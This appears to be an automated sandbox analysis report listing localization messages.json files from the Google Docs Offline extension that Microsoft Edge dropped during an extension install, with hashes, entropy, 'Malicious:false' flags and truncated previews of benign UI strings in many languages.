                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):3264
                                                                                                                                                                                                                                                                  Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                  MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                  SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                  SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                  SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):3235
                                                                                                                                                                                                                                                                  Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                  MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                  SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                  SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                  SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):3122
                                                                                                                                                                                                                                                                  Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                  MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                  SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                  SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                  SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1895
                                                                                                                                                                                                                                                                  Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                  MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                  SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                  SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                  SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1042
                                                                                                                                                                                                                                                                  Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                  MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                  SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                  SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                  SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2535
                                                                                                                                                                                                                                                                  Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                  MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                  SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                  SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                  SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1028
                                                                                                                                                                                                                                                                  Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                  MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                  SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                  SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                  SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):994
                                                                                                                                                                                                                                                                  Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                  MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                  SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                  SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                  SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2091
                                                                                                                                                                                                                                                                  Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                  MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                  SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                  SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                  SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2778
                                                                                                                                                                                                                                                                  Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                  MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                  SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                  SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                  SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1719
                                                                                                                                                                                                                                                                  Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                  MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                  SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                  SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                  SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):936
                                                                                                                                                                                                                                                                  Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                  MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                  SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                  SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                  SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):3830
                                                                                                                                                                                                                                                                  Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                  MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                  SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                  SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                  SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                  Malicious:false
